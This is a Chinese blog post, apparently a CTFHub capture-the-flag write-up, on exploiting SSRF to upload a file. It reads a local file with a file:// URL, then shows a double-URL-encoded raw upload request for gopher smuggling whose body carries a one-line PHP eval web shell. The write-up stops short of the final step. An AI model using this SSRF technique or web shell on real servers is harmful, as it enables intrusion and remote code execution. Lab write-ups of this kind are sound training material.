CTFHUB

阅读：评论：0

CTFHUB

CTFHUB-SSRF-上传文件
先用file协议读下flag.php的内容：

file:///var/www/html/flag.php

可知是随便上传个文件就行
访问127.0.0.1/flag.php，是个上传界面

但并没有提交，所以我们得自己补一个提交按钮：

<input type="submit" name="submit">

随便抓个上传包：

进行两次url编码，得到：

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%fhub%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A89.0%2529%2520Gecko/20100101%2520Firefox/89.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------19642135472788729183976965757%250D%250AContent-Length%253A%2520382%250D%250AOrigin%253A%2520http%253A//fhub%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//fhub%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------19642135472788729183976965757%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522ab.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527ctf%2527%255D%2529%253B%253F%253E%250D%250A-----------------------------19642135472788729183976965757%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------19642135472788729183976965757–

再抓一个最初的包：

利用gopher去发送请求：

本文发布于:2024-01-28 08:39:33，感谢您对本站的认可！

本文链接：https://www.4u4v.net/it/17064023866173.html

上一篇：CTFHub技能树 Web

下一篇：[WEB安全] 通过CTFHub学习SSRF

标签：CTFHUB

留言与评论（共有 0 条评论）